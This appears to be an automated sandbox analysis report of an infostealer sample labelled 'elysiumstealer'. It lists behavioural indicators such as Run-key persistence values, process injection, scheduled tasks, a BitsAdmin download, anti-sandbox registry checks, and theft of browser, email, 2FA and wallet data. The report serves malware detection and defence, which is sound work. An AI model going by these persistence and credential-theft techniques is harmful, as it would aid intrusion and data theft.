elysiumstealer | 4139739d5bfa8330e095a68c658040fb42c75cde651e3baa8afafb4fc557b202

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	Wibekizheny.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Control Panel\International\Geo\Nation	cmd.exe

Loads dropped DLL 23 IoCs

pid	Process
1956	LabPicV3.tmp
716	lylal220.tmp
2800	rundll32.exe
3020	RunWW.exe
3020	RunWW.exe
4224	rundll32.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
7028	y1.exe
2152	toolspab1.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
2160	df4e3841.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe
6584	SunLabsPlayer.exe

Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 3 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\haleng = "C:\\Users\\Admin\\AppData\\Local\\Temp\\haleng.exe"	hjjgaa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Windows\CurrentVersion\Run\Windows Host = "C:\\ProgramData\\Windows Host\\Windows Host.exe"	3648716.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Windows Sidebar\\Wytidewony.exe\""	alpATCHInO.exe

Checks for any installed AV software in registry 1 TTPs 1 IoCs

Security Software Discovery

T1063

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\SOFTWARE\KasperskyLab	sc.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 3 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
11	ip-api.com
76	ip-api.com
294	icanhazip.com

Drops file in System32 directory 3 IoCs

description	ioc	Process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\SPZGXR6I.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies\SPZGXR6I.cookie	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe

Suspicious use of SetThreadContext 5 IoCs

description	pid	Process	procid_target
PID 1920 set thread context of 4236	1920	svchost.exe	96
PID 1496 set thread context of 6136	1496	LOQn7WyBrhly.exe	120
PID 4352 set thread context of 6620	4352	1706868.exe	143
PID 4392 set thread context of 6628	4392	7945204.exe	142
PID 6984 set thread context of 2152	6984	toolspab1.exe	154

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegaudio_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\hjjgaa.exe	55CB4375683875666481DC417B20B757.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\LabPicV3.exe	55CB4375683875666481DC417B20B757.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\browse.xml	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libdirectory_demux_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_dirac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_flat_10_000000_40x100.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\luac.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libsftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\librawaud_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\mosaic_window.html	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\meta\art\02_frenchtv.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libshm_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libamem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libwin_msg_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libmod_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libfilesystem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mpegvideo_plugin.dll	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\AForge.Imaging.dll	prolab.tmp
File created	C:\Program Files (x86)\Picture Lab\is-7SLQL.tmp	prolab.tmp
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.INTEG.RAW	Process not Found
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon3.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\hrtfs\dodeca_and_7channel_3DSL_HRTF.sofa	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libimem_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\cue.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\rockbox_fm_presets.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\JoSetp.exe	55CB4375683875666481DC417B20B757.exe
File created	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\tmp.edb	Process not Found
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_222222_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-icons_ffd27a_256x240.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\dumpmeta.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\http.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Picture Lab\Pictures Lab.exe	prolab.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vimeo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libsubtitle_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libmosaic_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\text_renderer\libfreetype_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\unins.vbs	guihuali-game.exe
File opened for modification	C:\Program Files (x86)\94c45254-6d52-40cc-93fb-b69707383880\Versium Research\d.jfm	Process not Found
File opened for modification	C:\Program Files (x86)\Advanced Trip\lang\en-US.xml	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_glass_100_fdf5ce_1x400.png	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\intf\telnet.luac	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_3_hover.png	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\liveleak.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\meta_engine\libfolder_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\spu\libsubsdelay_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\dialogs\browse_window.html	SunLabsPlayer.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon4.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\control\libhotkeys_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\demux\libwav_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_flac_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libftp_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\access\libtimecode_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files\jp2native.dll	guihuali-game.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\images\gadget_button_1_normal.png	setup_10.2_mix.exe
File opened for modification	C:\Program Files (x86)\Advanced Trip\TrayIcon2.ico	setup_10.2_mix.exe
File created	C:\Program Files (x86)\lighteningplayer\libvlccore.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\http\requests\README.txt	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\lua\playlist\vocaroo.luac	SunLabsPlayer.exe
File created	C:\Program Files (x86)\lighteningplayer\plugins\audio_output\libmmdevice_plugin.dll	SunLabsPlayer.exe
File created	C:\Program Files (x86)\Picture Lab\is-0F72S.tmp	prolab.tmp
File created	C:\Program Files (x86)\lighteningplayer\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png	SunLabsPlayer.exe

Drops file in Windows directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 5 IoCs

pid	pid_target	Process	procid_target
1808	3656	WerFault.exe	81
7076	4124	WerFault.exe	168
4308	5064	WerFault.exe	194
3888	7120	WerFault.exe	273
6296	4828	WerFault.exe	274

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	toolspab1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	df4e3841.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	RunWW.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	RunWW.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5768	schtasks.exe
5992	schtasks.exe

Delays execution with timeout.exe 9 IoCs

evasion

pid	Process
900	timeout.exe
5892	timeout.exe
988	timeout.exe
4636	timeout.exe
5616	timeout.exe
5328	timeout.exe
4592	timeout.exe
5876	timeout.exe
1136	timeout.exe

Download via BitsAdmin 1 TTPs 1 IoCs

dropper

BITS Jobs

T1197

pid	Process
6748	bitsadmin.exe

Kills process with taskkill 2 IoCs

evasion

pid	Process
4268	taskkill.exe
6976	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe

Modifies data under HKEY_USERS 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-752 = "Tonga Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1871 = "Russia TZ 7 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-141 = "Canada Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-532 = "Sri Lanka Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-842 = "Argentina Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-32 = "Mid-Atlantic Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-742 = "New Zealand Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-385 = "Namibia Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1722 = "Libya Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-841 = "Argentina Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-491 = "India Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-432 = "Iran Standard Time"	app.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-81 = "Atlantic Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2491 = "Aus Central W. Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-332 = "E. Europe Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1041 = "Ulaanbaatar Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2612 = "Bougainville Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2841 = "Saratov Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-681 = "E. Australia Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-622 = "Korea Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2772 = "Omsk Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time"	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	app.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-242 = "Samoa Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-214 = "Pacific Daylight Time (Mexico)"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2451 = "Saint Pierre Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-292 = "Central European Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1472 = "Magadan Standard Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time"	app.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\C:\Windows\system32\,@tzres.dll,-691 = "Tasmania Daylight Time"	app.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\UserStateMigration\EdgeMigration\ManagerHistoryComplete = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\ACGPolicyState = "8"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modif	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListXMLVersionHigh = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1594587808-2047097707-2163810515-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
